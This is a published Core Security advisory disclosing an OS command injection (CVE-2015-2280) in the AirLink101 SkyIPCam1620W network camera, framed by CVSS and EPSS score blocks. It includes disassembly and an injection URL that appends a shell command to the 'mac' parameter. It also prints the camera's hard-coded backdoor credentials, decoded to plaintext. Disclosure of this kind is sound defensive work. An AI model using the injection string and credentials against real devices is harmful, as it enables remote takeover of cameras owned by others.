9 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
0.916 High
EPSS
Percentile
98.9%
**Title:**AirLink101 SkyIPCam1620W OS Command Injection
**Advisory ID:**CORE-2015-0011
Advisory URL:<https://www.coresecurity.com/advisories/airlink101-skyipcam1620w-os-command-injection>
**Date published:**2015-07-08
**Date of last update:**2015-07-08
**Vendors contacted:**AirLink101
**Release mode:**User release
**Class:**OS Command Injection [CWE-78], Use of Hard-coded Credentials" [CWE-798]
**Impact:**Code execution
**Remotely Exploitable:**Yes
**Locally Exploitable:**No
CVE Name:CVE-2015-2280
AirLink101 SkyIPCam1620W Wireless N MPEG4 3GPP Network Camera streams supreme quality MPEG4 and MJPEG image. It supports remote surveillance on computers over the Internet or on mobile handheld devices.
The SkyIPCam1620W Wireless N MPEG4 3GPP Network Camera [1] is vulnerable to an OS Command Injection Vulnerability in the snwrite.cgi binary.
Core Security recommends applying a WAF (Web Application Firewall) rule that would filter the vulnerable request (either the CGI file or the parameters where the injection is performed) in order to avoid exploitation.
Contact the vendor for further information.
This vulnerability was discovered and researched by Nahuel Riva from the Core Security Exploit Writing Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from the Core Security Advisories Team.
[CVE-2015-2280] The snwrite.cgi binary has an OS Command Injection at function loc_8928 when handling the “mac” parameter:
.text:00008928 .text:00008928 loc_8928 .text:00008928 BL memset .text:0000892C LDR R3, [R7,#0x40] .text:00008930 LDR R2, =stderr .text:00008934 ADD R3, R5, R3 .text:00008938 LDR R0, [R2] ; stream .text:0000893C LDR R1, =aMacS ; "mac = %s" .text:00008940 LDR R2, [R3,#0x104] .text:00008944 BL fprintf .text:00008948 LDR R2, [R7,#0x40] .text:0000894C ADD R2, R5, R2 .text:00008950 LDR R3, [R2,#0x104] .text:00008954 MOV R1, #0x80 ; maxlen .text:00008958 LDR R2, =aEtcInit_dMacwr ; "/etc/init.d/macwrite.sh %s 1>/dev/null "... .text:0000895C MOV R0, R8 ; s .text:00008960 BL snprintf .text:00008964 MOV R0, R8 ; command .text:00008968 BL system .text:0000896C LDR R4, [R7,#0x40] .text:00008970 B loc_8908 .text:00008970 ; End of function sub_88A8 .text:00008970
The “mac” parameter is used in a printf() call to build a command to execute the macwrite.sh shell script to update the MAC Address configuration. The printf() built string is then used in a system() call. Therefore, it is possible to inject arbitrary commands just by putting a “;” after the “mac” parameter, for example:
http://<Camera_IP>/maker/snwrite.cgi?mac=1234;ps
In order to invoke the snwrite.cgi binary valid credentials are required, but a backdoor account located in /server/usr.ini can be used:
nriva@fastix:/mnt/firmware/server$ cat usr.ini admin=Basic YWRtaW46YWRtaW4= maker=Basic cHJvZHVjdG1ha2VyOmZ0dnNiYW5uZWRjb2Rl
These accounts are encoded in base64 so it is relatively easy to recover them:
>>> "YWRtaW46YWRtaW4=".decode("base64") 'admin:admin' >>> "cHJvZHVjdG1ha2VyOmZ0dnNiYW5uZWRjb2Rl".decode("base64") 'productmaker:ftvsbannedcode'
Using the ‘productmaker:ftvsbannedcode’ backdoor account allows access to the path /maker/snwrite.cgi and therefore the ability to perform the injection explained above.
[1] <http://airlink101.com/products/aic1620w.php>.
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: CoreSecurity.com/core-labs.
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security’s software solutions build on over a decade of trusted research and leading-edge threat expertise from the company’s Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: <https://www.coresecurity.com>.
The contents of this advisory are copyright © 2015 Core Security and © 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at <https://www.coresecurity.com/files/attachments/core_security_advisories.asc>.
9 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
0.916 High
EPSS
Percentile
98.9%